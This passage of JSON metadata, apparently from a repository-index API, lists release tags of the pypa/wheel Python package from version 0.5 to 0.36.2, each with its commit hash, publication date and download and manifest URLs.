published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r